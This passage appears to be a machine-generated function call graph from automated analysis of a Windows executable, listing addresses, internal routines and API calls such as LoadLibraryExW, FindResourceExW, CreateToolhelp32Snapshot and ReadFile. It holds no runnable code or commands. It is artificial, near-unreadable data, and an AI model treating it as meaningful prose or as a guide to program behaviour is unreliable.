101049 521a36 59 API calls 101018->101049 101050 553d43 VariantClear 101018->101050 101051 553dd9 VariantClear 101018->101051 101052 5141c4 59 API calls Mailbox 101018->101052 101053 553b87 VariantClear 101018->101053 101054 567890 59 API calls 101018->101054 101055 515190 59 API calls Mailbox 101018->101055 102214 5152b0 101018->102214 102223 519a00 101018->102223 102230 519c80 101018->102230 102261 51a820 101018->102261 102278 573f97 101018->102278 102281 57bb43 101018->102281 102313 59627a 101018->102313 102320 58e3d4 101018->102320 102323 57c0dd 101018->102323 102330 51b020 101018->102330 102391 57566c 101018->102391 102401 53074e timeGetTime 101018->102401 102406 59641d 59 API calls 101018->102406 102407 579ec5 59 API calls Mailbox 101018->102407 102408 56de8d 59 API calls 101018->102408 102409 514d37 101018->102409 102427 566a45 59 API calls 2 library calls 101018->102427 102428 5138ff 59 API calls 101018->102428 102429 513a40 101018->102429 102443 58c11d 101018->102443 102483 566ec5 59 API calls 101018->102483 101019 59632a 110 API calls 101019->101032 101020->101018 101022->101018 101022->101023 101023->101032 101024->100829 101025 553feb 101025->101024 101026 5537da Sleep 101026->101018 101027 5543f8 Sleep 101027->101018 101030 521a36 59 API calls 101030->101032 101032->101003 101032->101016 101032->101018 101032->101019 101032->101025 101032->101026 101032->101027 101032->101030 101034 513ea3 68 API calls 101032->101034 102440 572a1b 60 API calls 101032->102440 102441 515376 60 API calls 101032->102441 102442 516cd8 290 API calls 101032->102442 102484 53074e timeGetTime 101032->102484 102485 573fb5 CreateToolhelp32Snapshot Process32FirstW 101032->102485 101034->101032 101035->101018 101040 521a36 59 API calls 101037->101040 101040->100989 101042->101018 101045->101018 101046->101018 101047->101018 101049->101018 101050->101018 101051->101018 101052->101018 101053->101018 101054->101018 101055->101018 101062 525b25 101061->101062 101063 525ad5 _memset 101061->101063 101062->100831 101065->100806 101066->100819 101068 541aa0 __ftell_nolock 101067->101068 101069 530007 GetModuleFileNameW 101068->101069 101070 521a36 59 API calls 101069->101070 101071 53002d 101070->101071 101072 5301af 60 API calls 101071->101072 101073 530037 Mailbox 101072->101073 101073->100826 101075 521a45 __NMSG_WRITE _memmove 101074->101075 101076 530f16 Mailbox 59 API calls 101075->101076 101077 521a83 101076->101077 101097 530f1e 101094->101097 101096 530f38 101096->100850 101097->101096 101099 530f3c std::exception::exception 101097->101099 101104 53586c 101097->101104 101121 533503 DecodePointer 101097->101121 101122 5386fb RaiseException 101099->101122 101101 530f66 101123 538631 58 API calls _free 101101->101123 101103 530f78 101103->100850 101105 5358e7 101104->101105 101109 535878 101104->101109 101129 533503 DecodePointer 101105->101129 101107 5358ed 101130 538c88 58 API calls __getptd_noexit 101107->101130 101108 535883 101108->101109 101116 533201 __mtinitlocknum 3 API calls 101108->101116 101124 53a2cb 58 API calls __NMSG_WRITE 101108->101124 101125 53a328 58 API calls 5 library calls 101108->101125 101109->101108 101112 5358ab RtlAllocateHeap 101109->101112 101115 5358d3 101109->101115 101119 5358d1 101109->101119 101126 533503 DecodePointer 101109->101126 101112->101109 101113 5358df 101112->101113 101113->101097 101127 538c88 58 API calls __getptd_noexit 101115->101127 101116->101108 101128 538c88 58 API calls __getptd_noexit 101119->101128 101121->101097 101122->101101 101123->101103 101124->101108 101125->101108 101126->101109 101127->101119 101128->101113 101129->101107 101130->101113 101132 52542d __ftell_nolock 101131->101132 101133 521821 59 API calls 101132->101133 101138 525590 Mailbox 101132->101138 101135 52545f 101133->101135 101144 525495 Mailbox 101135->101144 101196 521609 101135->101196 101136 525563 101137 521a36 59 API calls 101136->101137 101136->101138 101139 525584 101137->101139 101138->100857 101141 524c94 59 API calls 101139->101141 101140 521a36 59 API calls 101140->101144 101141->101138 101142 521609 59 API calls 101142->101144 101144->101136 101144->101138 101144->101140 101144->101142 101199 524c94 101144->101199 101146 5219fb 101145->101146 101148 5219ee 101145->101148 101147 530f16 Mailbox 59 API calls 101146->101147 101147->101148 101148->100859 101150 521ca7 101149->101150 101151 521caf 101149->101151 101209 521bcc 101150->101209 101153 51477a 101151->101153 101154 530f16 Mailbox 59 API calls 101153->101154 101155 514787 101154->101155 101155->100864 101157 5139c9 101156->101157 101158 5139f0 101157->101158 101213 513ea3 101157->101213 101158->100867 101161 5255c6 101160->101161 101162 5255df 101160->101162 101164 521c9c 59 API calls 101161->101164 101163 521821 59 API calls 101162->101163 101165 524fa0 101163->101165 101164->101165 101166 53305f 101165->101166 101167 5330e0 101166->101167 101168 53306b 101166->101168 101243 5330f2 60 API calls 4 library calls 101167->101243 101172 533090 101168->101172 101241 538c88 58 API calls __getptd_noexit 101168->101241 101171 5330ed 101171->100877 101172->100877 101173 533077 101242 538f16 9 API calls __cftoe2_l 101173->101242 101175 533082 101175->100877 101177 5147c6 101176->101177 101178 530f16 Mailbox 59 API calls 101177->101178 101179 5147d4 101178->101179 101180 5147e0 101179->101180 101244 5146ec 59 API calls Mailbox 101179->101244 101182 514540 101180->101182 101245 514650 101182->101245 101184 51454f 101185 530f16 Mailbox 59 API calls 101184->101185 101186 5145eb 101184->101186 101185->101186 101187 5143d0 101186->101187 101188 54d5f9 101187->101188 101190 5143e7 101187->101190 101188->101190 101259 5140cb 59 API calls Mailbox 101188->101259 101191 514530 101190->101191 101192 5144e8 101190->101192 101195 5144ef 101190->101195 101193 51523c 59 API calls 101191->101193 101194 530f16 Mailbox 59 API calls 101192->101194 101193->101195 101194->101195 101195->100918 101205 521aa4 101196->101205 101198 521614 101198->101135 101200 524ca2 101199->101200 101204 524cc4 _memmove 101199->101204 101202 530f16 Mailbox 59 API calls 101200->101202 101201 530f16 Mailbox 59 API calls 101203 524cd8 101201->101203 101202->101204 101203->101144 101204->101201 101206 521ab7 101205->101206 101208 521ab4 _memmove 101205->101208 101207 530f16 Mailbox 59 API calls 101206->101207 101207->101208 101208->101198 101210 521bef _memmove 101209->101210 101211 521bdc 101209->101211 101210->101151 101211->101210 101212 530f16 Mailbox 59 API calls 101211->101212 101212->101210 101229 513c30 101213->101229 101215 513eb3 101216 513f2d 101215->101216 101217 513ebd 101215->101217 101237 51523c 101216->101237 101218 530f16 Mailbox 59 API calls 101217->101218 101220 513ece 101218->101220 101222 513edc 101220->101222 101223 521207 59 API calls 101220->101223 101221 513f1d 101221->101158 101224 513eeb 101222->101224 101225 521bcc 59 API calls 101222->101225 101223->101222 101226 530f16 Mailbox 59 API calls 101224->101226 101225->101224 101227 513ef5 101226->101227 101236 513bc8 68 API calls 101227->101236 101230 513e11 101229->101230 101231 513c43 101229->101231 101230->101215 101232 521207 59 API calls 101231->101232 101235 513c54 101231->101235 101233 513e73 101232->101233 101234 532ea0 __cinit 67 API calls 101233->101234 101234->101235 101235->101215 101236->101221 101238 51524a 101237->101238 101239 515250 101237->101239 101238->101239 101240 521c9c 59 API calls 101238->101240 101239->101221 101240->101239 101241->101173 101242->101175 101243->101171 101244->101180 101246 514659 Mailbox 101245->101246 101247 54d61c 101246->101247 101251 514663 101246->101251 101249 530f16 Mailbox 59 API calls 101247->101249 101248 51466a 101248->101184 101250 54d628 101249->101250 101251->101248 101253 515190 101251->101253 101254 51519b 101253->101254 101255 5151d2 101254->101255 101258 5141c4 59 API calls Mailbox 101254->101258 101255->101251 101257 5151fd 101257->101251 101258->101257 101259->101190 101322 541aa0 101260->101322 101263 5301db 101266 521821 59 API calls 101263->101266 101264 5301f8 101265 5219e1 59 API calls 101264->101265 101267 5301e7 101265->101267 101266->101267 101324 52133d 101267->101324 101270 5308f0 101271 541aa0 __ftell_nolock 101270->101271 101272 5308fd GetLongPathNameW 101271->101272 101273 521821 59 API calls 101272->101273 101274 5231f7 101273->101274 101275 522f3d 101274->101275 101276 521207 59 API calls 101275->101276 101277 522f4f 101276->101277 101278 5301af 60 API calls 101277->101278 101279 522f5a 101278->101279 101280 522f65 101279->101280 101283 5600f7 101279->101283 101282 524c94 59 API calls 101280->101282 101284 522f71 101282->101284 101286 560111 101283->101286 101338 52151f 101283->101338 101332 511307 101284->101332 101287 522f84 Mailbox 101287->100934 101348 5249c2 101288->101348 101291 55f856 101465 579983 101291->101465 101292 5249c2 136 API calls 101294 5227c3 101292->101294 101294->101291 101296 5227cb 101294->101296 101300 5227d7 101296->101300 101301 55f873 101296->101301 101297 55f888 101299 530f16 Mailbox 59 API calls 101297->101299 101298 55f86b 101523 524a2f 101298->101523 101311 55f8cd Mailbox 101299->101311 101372 5229be 101300->101372 101529 574655 90 API calls _wprintf 101301->101529 101306 55f881 101306->101297 101307 55fa81 101308 532eb5 _free 58 API calls 101307->101308 101309 55fa89 101308->101309 101310 524a2f 84 API calls 101309->101310 101316 55fa92 101310->101316 101311->101307 101311->101316 101319 521a36 59 API calls 101311->101319 101500 56fcdb 101311->101500 101503 5777a7 101311->101503 101509 52343f 101311->101509 101517 523297 101311->101517 101530 56fbfc 61 API calls 2 library calls 101311->101530 101315 532eb5 _free 58 API calls 101315->101316 101316->101315 101317 524a2f 84 API calls 101316->101317 101531 56fd3f 89 API calls 4 library calls 101316->101531 101317->101316 101319->101311 101323 5301bc GetFullPathNameW 101322->101323 101323->101263 101323->101264 101325 52134b 101324->101325 101328 521981 101325->101328 101327 52135b 101327->101270 101329 521998 _memmove 101328->101329 101330 52198f 101328->101330 101329->101327 101330->101329 101331 521aa4 59 API calls 101330->101331 101331->101329 101333 511319 101332->101333 101337 511338 _memmove 101332->101337 101335 530f16 Mailbox 59 API calls 101333->101335 101334 530f16 Mailbox 59 API calls 101336 51134f 101334->101336 101335->101337 101336->101287 101337->101334 101341 5214db 101338->101341 101342 5214e9 CompareStringW 101341->101342 101347 55f190 101341->101347 101345 52150c 101342->101345 101344 55f1df 101345->101283 101346 534de8 60 API calls 101346->101347 101347->101344 101347->101346 101532 524b29 101348->101532 101353 56083b 101356 524a2f 84 API calls 101353->101356 101354 5249ed LoadLibraryExW 101542 524ade 101354->101542 101358 560842 101356->101358 101360 524ade 3 API calls 101358->101360 101362 56084a 101360->101362 101361 524a14 101361->101362 101363 524a20 101361->101363 101568 524ab2 101362->101568 101365 524a2f 84 API calls 101363->101365 101367 5227af 101365->101367 101367->101291 101367->101292 101369 560871 101576 524a6e 101369->101576 101373 55fc94 101372->101373 101374 5229e7 101372->101374 102003 56fd3f 89 API calls 4 library calls 101373->102003 101936 523df7 60 API calls Mailbox 101374->101936 101377 522a09 101937 523e47 67 API calls 101377->101937 101378 55fca7 102004 56fd3f 89 API calls 4 library calls 101378->102004 101380 522a1e 101380->101378 101382 522a26 101380->101382 101384 521207 59 API calls 101382->101384 101383 55fcc3 101414 522a93 101383->101414 101385 522a32 101384->101385 101938 530ab6 60 API calls __ftell_nolock 101385->101938 101387 522a3e 101390 521207 59 API calls 101387->101390 101388 522aa1 101392 521207 59 API calls 101388->101392 101389 55fcd6 101391 5242cf CloseHandle 101389->101391 101393 522a4a 101390->101393 101394 55fce2 101391->101394 101395 522aaa 101392->101395 101396 5301af 60 API calls 101393->101396 101397 5249c2 136 API calls 101394->101397 101398 521207 59 API calls 101395->101398 101399 522a58 101396->101399 101403 55fcfe 101397->101403 101400 522ab3 101398->101400 101939 523ea1 ReadFile SetFilePointerEx 101399->101939 101941 530044 101400->101941 101402 55fd23 102005 56fd3f 89 API calls 4 library calls 101402->102005 101403->101402 101407 579983 122 API calls 101403->101407 101406 522a84 101940 52410a SetFilePointerEx SetFilePointerEx 101406->101940 101412 55fd16 101407->101412 101408 522aca 101409 5217e0 59 API calls 101408->101409 101413 522adb SetCurrentDirectoryW 101409->101413 101410 55fd3a 101443 522c3e Mailbox 101410->101443 101415 55fd3f 101412->101415 101416 55fd1e 101412->101416 101421 522aee Mailbox 101413->101421 101414->101388 101414->101389 101417 524a2f 84 API calls 101415->101417 101418 524a2f 84 API calls 101416->101418 101419 55fd44 101417->101419 101418->101402 101420 530f16 Mailbox 59 API calls 101419->101420 101427 55fd78 101420->101427 101423 530f16 Mailbox 59 API calls 101421->101423 101425 522b01 101423->101425 101424 5227ef 101424->100807 101424->100831 101426 52433f 59 API calls 101425->101426 101454 522b0c Mailbox __NMSG_WRITE 101426->101454 101428 52343f 59 API calls 101427->101428 101462 55fdc1 Mailbox 101428->101462 101429 522c19 101999 5242cf 101429->101999 101432 55ffb2 102008 577707 101432->102008 101433 522c25 SetCurrentDirectoryW 101433->101443 101436 55ffd4 102012 570267 59 API calls 2 library calls 101436->102012 101439 55ffe1 101441 532eb5 _free 58 API calls 101439->101441 101440 56004b 102015 56fd3f 89 API calls 4 library calls 101440->102015 101441->101443 101931 523e25 101443->101931 101445 52343f 59 API calls 101445->101462 101446 560064 101446->101429 101448 560043 102014 56fb95 59 API calls 4 library calls 101448->102014 101451 521a36 59 API calls 101451->101454 101452 56fcdb 59 API calls 101452->101462 101454->101429 101454->101440 101454->101448 101454->101451 101992 523ebe 67 API calls _wcscpy 101454->101992 101993 522e8f GetStringTypeW 101454->101993 101994 522dfe 60 API calls __wcsnicmp 101454->101994 101995 522edc GetStringTypeW __NMSG_WRITE 101454->101995 101996 53379f GetStringTypeW _iswctype 101454->101996 101997 5227fc 165 API calls 3 library calls 101454->101997 101998 52314d 59 API calls Mailbox 101454->101998 101455 521a36 59 API calls 101455->101462 101457 5777a7 59 API calls 101457->101462 101459 560004 102013 56fd3f 89 API calls 4 library calls 101459->102013 101461 56001d 101463 532eb5 _free 58 API calls 101461->101463 101462->101432 101462->101445 101462->101452 101462->101455 101462->101457 101462->101459 102006 56fbfc 61 API calls 2 library calls 101462->102006 102007 52314d 59 API calls Mailbox 101462->102007 101464 560030 101463->101464 101464->101443 101466 524a8c 85 API calls 101465->101466 101467 5799f2 101466->101467 102034 579b5e 101467->102034 101470 524ab2 74 API calls 101471 579a21 101470->101471 101472 524ab2 74 API calls 101471->101472 101473 579a31 101472->101473 101474 524ab2 74 API calls 101473->101474 101475 579a4c 101474->101475 101476 524ab2 74 API calls 101475->101476 101477 579a67 101476->101477 101478 524a8c 85 API calls 101477->101478 101479 579a7e 101478->101479 101480 53586c _W_store_winword 58 API calls 101479->101480 101481 579a85 101480->101481 101482 53586c _W_store_winword 58 API calls 101481->101482 101483 579a8f 101482->101483 101484 524ab2 74 API calls 101483->101484 101485 579aa3 101484->101485 101486 579531 GetSystemTimeAsFileTime 101485->101486 101487 579ab6 101486->101487 101488 579ae0 101487->101488 101489 579acb 101487->101489 101491 579ae6 101488->101491 101492 579b45 101488->101492 101490 532eb5 _free 58 API calls 101489->101490 101493 579ad1 101490->101493 102040 578f2e 116 API calls __fcloseall 101491->102040 101495 532eb5 _free 58 API calls 101492->101495 101496 532eb5 _free 58 API calls 101493->101496 101498 55f867 101495->101498 101496->101498 101497 579b3d 101499 532eb5 _free 58 API calls 101497->101499 101498->101297 101498->101298 101499->101498 101501 530f16 Mailbox 59 API calls 101500->101501 101502 56fd0b _memmove 101501->101502 101502->101311 101504 5777b2 101503->101504 101505 530f16 Mailbox 59 API calls 101504->101505 101506 5777c9 101505->101506 101507 521a36 59 API calls 101506->101507 101508 5777d8 101506->101508 101507->101508 101508->101311 101510 5234df 101509->101510 101516 523452 _memmove 101509->101516 101512 530f16 Mailbox 59 API calls 101510->101512 101511 530f16 Mailbox 59 API calls 101513 523459 101511->101513 101512->101516 101514 523482 101513->101514 101515 530f16 Mailbox 59 API calls 101513->101515 101514->101311 101515->101514 101516->101511 101518 5232aa 101517->101518 101520 523358 101517->101520 101519 530f16 Mailbox 59 API calls 101518->101519 101522 5232dc 101518->101522 101519->101522 101520->101311 101521 530f16 59 API calls Mailbox 101521->101522 101522->101520 101522->101521 101524 524a40 101523->101524 101525 524a39 101523->101525 101527 524a60 FreeLibrary 101524->101527 101528 524a4f 101524->101528 102041 5354f6 101525->102041 101527->101528 101528->101301 101529->101306 101530->101311 101531->101316 101581 524b77 101532->101581 101535 524b50 101536 524b60 FreeLibrary 101535->101536 101537 5249d4 101535->101537 101536->101537 101539 5353ab 101537->101539 101538 524b77 2 API calls 101538->101535 101585 5353c0 101539->101585 101541 5249e1 101541->101353 101541->101354 101666 524baa 101542->101666 101545 524b03 101546 524b15 FreeLibrary 101545->101546 101547 524a05 101545->101547 101546->101547 101549 5248b0 101547->101549 101548 524baa 2 API calls 101548->101545 101550 530f16 Mailbox 59 API calls 101549->101550 101551 5248c5 101550->101551 101670 52433f 101551->101670 101553 5248d1 _memmove 101554 56078a 101553->101554 101555 52490c 101553->101555 101556 560797 101554->101556 101678 579d45 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 101554->101678 101557 524a6e 69 API calls 101555->101557 101679 579dcb 95 API calls 101556->101679 101560 524915 101557->101560 101561 524ab2 74 API calls 101560->101561 101564 5607d9 101560->101564 101565 524a8c 85 API calls 101560->101565 101567 5249a0 101560->101567 101561->101560 101673 524a8c 101564->101673 101565->101560 101566 524ab2 74 API calls 101566->101567 101567->101361 101569 524ac4 101568->101569 101572 5608c5 101568->101572 101785 535732 101569->101785 101573 579531 101910 579387 101573->101910 101575 579547 101575->101369 101577 560888 101576->101577 101578 524a7d 101576->101578 101915 535db0 101578->101915 101580 524a85 101582 524b44 101581->101582 101583 524b80 LoadLibraryA 101581->101583 101582->101535 101582->101538 101583->101582 101584 524b91 GetProcAddress 101583->101584 101584->101582 101588 5353cc __setmbcp 101585->101588 101586 5353df 101634 538c88 58 API calls __getptd_noexit 101586->101634 101588->101586 101590 535410 101588->101590 101589 5353e4 101635 538f16 9 API calls __cftoe2_l 101589->101635 101604 540648 101590->101604 101593 535415 101594 53542b 101593->101594 101595 53541e 101593->101595 101597 535455 101594->101597 101598 535435 101594->101598 101636 538c88 58 API calls __getptd_noexit 101595->101636 101619 540767 101597->101619 101637 538c88 58 API calls __getptd_noexit 101598->101637 101599 5353ef @_EH4_CallFilterFunc@8 __setmbcp 101599->101541 101605 540654 __setmbcp 101604->101605 101606 539d6b __lock 58 API calls 101605->101606 101617 540662 101606->101617 101607 5406d6 101639 54075e 101607->101639 101608 5406dd 101644 53897d 58 API calls 2 library calls 101608->101644 101611 540753 __setmbcp 101611->101593 101612 5406e4 101612->101607 101645 539f8b InitializeCriticalSectionAndSpinCount 101612->101645 101613 539df3 __mtinitlocknum 58 API calls 101613->101617 101616 54070a EnterCriticalSection 101616->101607 101617->101607 101617->101608 101617->101613 101642 536dad 59 API calls __lock 101617->101642 101643 536e17 LeaveCriticalSection LeaveCriticalSection _doexit 101617->101643 101620 540787 __wopenfile 101619->101620 101621 5407a1 101620->101621 101633 54095c 101620->101633 101652 53392b 60 API calls 3 library calls 101620->101652 101650 538c88 58 API calls __getptd_noexit 101621->101650 101623 5407a6 101651 538f16 9 API calls __cftoe2_l 101623->101651 101625 535460 101638 535482 LeaveCriticalSection LeaveCriticalSection __wfsopen 101625->101638 101626 5409bf 101647 548701 101626->101647 101629 540955 101629->101633 101653 53392b 60 API calls 3 library calls 101629->101653 101631 540974 101631->101633 101654 53392b 60 API calls 3 library calls 101631->101654 101633->101621 101633->101626 101634->101589 101635->101599 101636->101599 101637->101599 101638->101599 101646 539ed5 LeaveCriticalSection 101639->101646 101641 540765 101641->101611 101642->101617 101643->101617 101644->101612 101645->101616 101646->101641 101655 547ee5 101647->101655 101649 54871a 101649->101625 101650->101623 101651->101625 101652->101629 101653->101631 101654->101633 101656 547ef1 __setmbcp 101655->101656 101657 547f07 101656->101657 101660 547f3d 101656->101660 101658 538c88 ___libm_error_support 58 API calls 101657->101658 101659 547f0c 101658->101659 101662 538f16 __cftoe2_l 9 API calls 101659->101662 101661 547fae __wsopen_nolock 109 API calls 101660->101661 101663 547f59 101661->101663 101665 547f16 __setmbcp 101662->101665 101664 547f82 __wsopen_helper LeaveCriticalSection 101663->101664 101664->101665 101665->101649 101667 524af7 101666->101667 101668 524bb3 LoadLibraryA 101666->101668 101667->101545 101667->101548 101668->101667 101669 524bc4 GetProcAddress 101668->101669 101669->101667 101671 530f16 Mailbox 59 API calls 101670->101671 101672 524351 101671->101672 101672->101553 101674 5608a3 101673->101674 101675 524a9b 101673->101675 101680 53599d 101675->101680 101677 524aa9 101677->101566 101678->101556 101679->101560 101684 5359a9 __setmbcp 101680->101684 101681 5359bb 101711 538c88 58 API calls __getptd_noexit 101681->101711 101683 5359e1 101693 536d6e 101683->101693 101684->101681 101684->101683 101686 5359c0 101712 538f16 9 API calls __cftoe2_l 101686->101712 101692 5359cb __setmbcp 101692->101677 101694 536da0 EnterCriticalSection 101693->101694 101695 536d7e 101693->101695 101696 5359e7 101694->101696 101695->101694 101697 536d86 101695->101697 101699 53590e 101696->101699 101698 539d6b __lock 58 API calls 101697->101698 101698->101696 101700 53592c 101699->101700 101701 53591c 101699->101701 101703 535942 101700->101703 101714 535a20 101700->101714 101784 538c88 58 API calls __getptd_noexit 101701->101784 101743 534b8d 101703->101743 101704 535921 101713 535a18 LeaveCriticalSection LeaveCriticalSection __wfsopen 101704->101713 101709 535983 101756 54178f 101709->101756 101711->101686 101712->101692 101713->101692 101715 535a2d __ftell_nolock 101714->101715 101716 535a45 101715->101716 101717 535a5d 101715->101717 101718 538c88 ___libm_error_support 58 API calls 101716->101718 101719 534836 __stbuf 58 API calls 101717->101719 101721 535a4a 101718->101721 101720 535a65 101719->101720 101723 54178f __write 64 API calls 101720->101723 101722 538f16 __cftoe2_l 9 API calls 101721->101722 101741 535a55 101722->101741 101724 535a81 101723->101724 101727 535c71 101724->101727 101729 535b04 101724->101729 101724->101741 101725 53c756 __cftoe2_l 6 API calls 101726 535dac 101725->101726 101726->101703 101728 535c7a 101727->101728 101733 535c2d 101727->101733 101730 538c88 ___libm_error_support 58 API calls 101728->101730 101731 535b2a 101729->101731 101729->101733 101730->101741 101732 541925 __lseeki64 62 API calls 101731->101732 101731->101741 101734 535b63 101732->101734 101735 54178f __write 64 API calls 101733->101735 101733->101741 101736 535b8f ReadFile 101734->101736 101734->101741 101737 535cde 101735->101737 101738 535bb4 101736->101738 101736->101741 101740 54178f __write 64 API calls 101737->101740 101737->101741 101739 54178f __write 64 API calls 101738->101739 101742 535bc7 101739->101742 101740->101741 101741->101725 101742->101741 101744 534ba0 101743->101744 101745 534bc4 101743->101745 101744->101745 101746 534836 __stbuf 58 API calls 101744->101746 101749 534836 101745->101749 101747 534bbd 101746->101747 101748 53d9e6 __write 78 API calls 101747->101748 101748->101745 101750 534840 101749->101750 101751 534855 101749->101751 101752 538c88 ___libm_error_support 58 API calls 101750->101752 101751->101709 101753 534845 101752->101753 101754 538f16 __cftoe2_l 9 API calls 101753->101754 101755 534850 101754->101755 101755->101709 101757 54179b __setmbcp 101756->101757 101758 5417bf 101757->101758 101759 5417a8 101757->101759 101761 54185e 101758->101761 101763 5417d3 101758->101763 101760 538c54 __read 58 API calls 101759->101760 101762 5417ad 101760->101762 101764 538c54 __read 58 API calls 101761->101764 101765 538c88 ___libm_error_support 58 API calls 101762->101765 101766 5417f1 101763->101766 101767 5417fb 101763->101767 101768 5417f6 101764->101768 101773 5417b4 __setmbcp 101765->101773 101769 538c54 __read 58 API calls 101766->101769 101770 53d366 ___lock_fhandle 59 API calls 101767->101770 101772 538c88 ___libm_error_support 58 API calls 101768->101772 101769->101768 101771 541801 101770->101771 101774 541814 101771->101774 101775 541827 101771->101775 101776 54186a 101772->101776 101773->101704 101777 54187e __lseek_nolock 62 API calls 101774->101777 101779 538c88 ___libm_error_support 58 API calls 101775->101779 101778 538f16 __cftoe2_l 9 API calls 101776->101778 101780 541820 101777->101780 101778->101773 101781 54182c 101779->101781 101783 541856 __write LeaveCriticalSection 101780->101783 101782 538c54 __read 58 API calls 101781->101782 101782->101780 101783->101773 101784->101704 101788 53574d 101785->101788 101787 524ad5 101787->101573 101789 535759 __setmbcp 101788->101789 101790 535794 __setmbcp 101789->101790 101791 53576f _memset 101789->101791 101792 53579c 101789->101792 101790->101787 101815 538c88 58 API calls __getptd_noexit 101791->101815 101793 536d6e __lock_file 59 API calls 101792->101793 101794 5357a2 101793->101794 101801 53556d 101794->101801 101796 535789 101816 538f16 9 API calls __cftoe2_l 101796->101816 101803 535588 _memset 101801->101803 101808 5355a3 101801->101808 101802 535593 101906 538c88 58 API calls __getptd_noexit 101802->101906 101803->101802 101803->101808 101813 5355e3 101803->101813 101805 535598 101907 538f16 9 API calls __cftoe2_l 101805->101907 101817 5357d6 LeaveCriticalSection LeaveCriticalSection __wfsopen 101808->101817 101809 5356f4 _memset 101909 538c88 58 API calls __getptd_noexit 101809->101909 101811 534836 __stbuf 58 API calls 101811->101813 101813->101808 101813->101809 101813->101811 101818 540fbe 101813->101818 101886 540d07 101813->101886 101908 540e28 58 API calls 4 library calls 101813->101908 101815->101796 101816->101790 101817->101790 101819 540ff6 101818->101819 101820 540fdf 101818->101820 101821 54172e 101819->101821 101825 541030 101819->101825 101822 538c54 __read 58 API calls 101820->101822 101823 538c54 __read 58 API calls 101821->101823 101824 540fe4 101822->101824 101826 541733 101823->101826 101827 538c88 ___libm_error_support 58 API calls 101824->101827 101828 541038 101825->101828 101836 54104f 101825->101836 101829 538c88 ___libm_error_support 58 API calls 101826->101829 101832 540feb 101827->101832 101830 538c54 __read 58 API calls 101828->101830 101831 541044 101829->101831 101833 54103d 101830->101833 101834 538f16 __cftoe2_l 9 API calls 101831->101834 101832->101813 101838 538c88 ___libm_error_support 58 API calls 101833->101838 101834->101832 101835 541064 101839 538c54 __read 58 API calls 101835->101839 101836->101832 101836->101835 101837 54107e 101836->101837 101841 54109c 101836->101841 101837->101835 101840 541089 101837->101840 101838->101831 101839->101833 101844 545dcb __stbuf 58 API calls 101840->101844 101842 53897d __malloc_crt 58 API calls 101841->101842 101843 5410ac 101842->101843 101846 5410b4 101843->101846 101847 5410cf 101843->101847 101845 54119d 101844->101845 101848 541216 ReadFile 101845->101848 101851 5411b3 GetConsoleMode 101845->101851 101850 538c88 ___libm_error_support 58 API calls 101846->101850 101849 541a21 __lseeki64_nolock 60 API calls 101847->101849 101852 5416f6 GetLastError 101848->101852 101853 541238 101848->101853 101849->101840 101854 5410b9 101850->101854 101855 5411c7 101851->101855 101856 541213 101851->101856 101857 541703 101852->101857 101862 5411f6 101852->101862 101853->101852 101860 541208 101853->101860 101858 538c54 __read 58 API calls 101854->101858 101855->101856 101861 5411cd ReadConsoleW 101855->101861 101856->101848 101859 538c88 ___libm_error_support 58 API calls 101857->101859 101858->101832 101863 541708 101859->101863 101868 5411fc 101860->101868 101869 54126d 101860->101869 101876 5414da 101860->101876 101861->101860 101864 5411f0 GetLastError 101861->101864 101865 538c67 __dosmaperr 58 API calls 101862->101865 101862->101868 101866 538c54 __read 58 API calls 101863->101866 101864->101862 101865->101868 101866->101868 101867 532eb5 _free 58 API calls 101867->101832 101868->101832 101868->101867 101871 5412d9 ReadFile 101869->101871 101879 54135a 101869->101879 101872 5412fa GetLastError 101871->101872 101885 541304 101871->101885 101872->101885 101873 541417 101880 5413c7 MultiByteToWideChar 101873->101880 101881 541a21 __lseeki64_nolock 60 API calls 101873->101881 101874 541407 101877 538c88 ___libm_error_support 58 API calls 101874->101877 101875 5415e0 ReadFile 101878 541603 GetLastError 101875->101878 101884 541611 101875->101884 101876->101868 101876->101875 101877->101868 101878->101884 101879->101868 101879->101873 101879->101874 101879->101880 101880->101864 101880->101868 101881->101880 101882 541a21 __lseeki64_nolock 60 API calls 101882->101885 101883 541a21 __lseeki64_nolock 60 API calls 101883->101884 101884->101876 101884->101883 101885->101869 101885->101882 101887 540d12 101886->101887 101891 540d27 101886->101891 101888 538c88 ___libm_error_support 58 API calls 101887->101888 101889 540d17 101888->101889 101890 538f16 __cftoe2_l 9 API calls 101889->101890 101898 540d22 101890->101898 101892 540d5c 101891->101892 101893 546144 __getbuf 58 API calls 101891->101893 101891->101898 101894 534836 __stbuf 58 API calls 101892->101894 101893->101892 101895 540d70 101894->101895 101896 540ea7 __read 72 API calls 101895->101896 101897 540d77 101896->101897 101897->101898 101899 534836 __stbuf 58 API calls 101897->101899 101898->101813 101900 540d9a 101899->101900 101900->101898 101901 534836 __stbuf 58 API calls 101900->101901 101902 540da6 101901->101902 101902->101898 101903 534836 __stbuf 58 API calls 101902->101903 101904 540db3 101903->101904 101905 534836 __stbuf 58 API calls 101904->101905 101905->101898 101906->101805 101907->101808 101908->101813 101909->101805 101913 53535a GetSystemTimeAsFileTime 101910->101913 101912 579396 101912->101575 101914 535388 __aulldiv 101913->101914 101914->101912 101916 535dbc __setmbcp 101915->101916 101917 535de3 101916->101917 101918 535dce 101916->101918 101920 536d6e __lock_file 59 API calls 101917->101920 101928 538c88 58 API calls __getptd_noexit 101918->101928 101922 535de9 101920->101922 101921 535dd3 101929 538f16 9 API calls __cftoe2_l 101921->101929 101924 535a20 __ftell_nolock 67 API calls 101922->101924 101925 535df4 101924->101925 101930 535e14 LeaveCriticalSection LeaveCriticalSection __wfsopen 101925->101930 101927 535dde __setmbcp 101927->101580 101928->101921 101929->101927 101930->101927 101932 5242cf CloseHandle 101931->101932 101933 523e2d Mailbox 101932->101933 101934 5242cf CloseHandle 101933->101934 101935 523e3c 101934->101935 101935->101424 101936->101377 101937->101380 101938->101387 101939->101406 101940->101414 101942 521207 59 API calls 101941->101942 101943 53005a 101942->101943 101944 521207 59 API calls 101943->101944 101945 530062 101944->101945 101946 521207 59 API calls 101945->101946 101947 53006a 101946->101947 101948 521207 59 API calls 101947->101948 101949 530072 101948->101949 101950 566062 101949->101950 101951 5300a6 101949->101951 101952 521c9c 59 API calls 101950->101952 101953 521462 59 API calls 101951->101953 101954 56606b 101952->101954 101955 5300b4 101953->101955 101956 5219e1 59 API calls 101954->101956 101957 521981 59 API calls 101955->101957 101959 5300e9 101956->101959 101958 5300be 101957->101958 101958->101959 101960 521462 59 API calls 101958->101960 101961 530129 101959->101961 101963 530108 101959->101963 101974 56608b 101959->101974 101964 5300df 101960->101964 102016 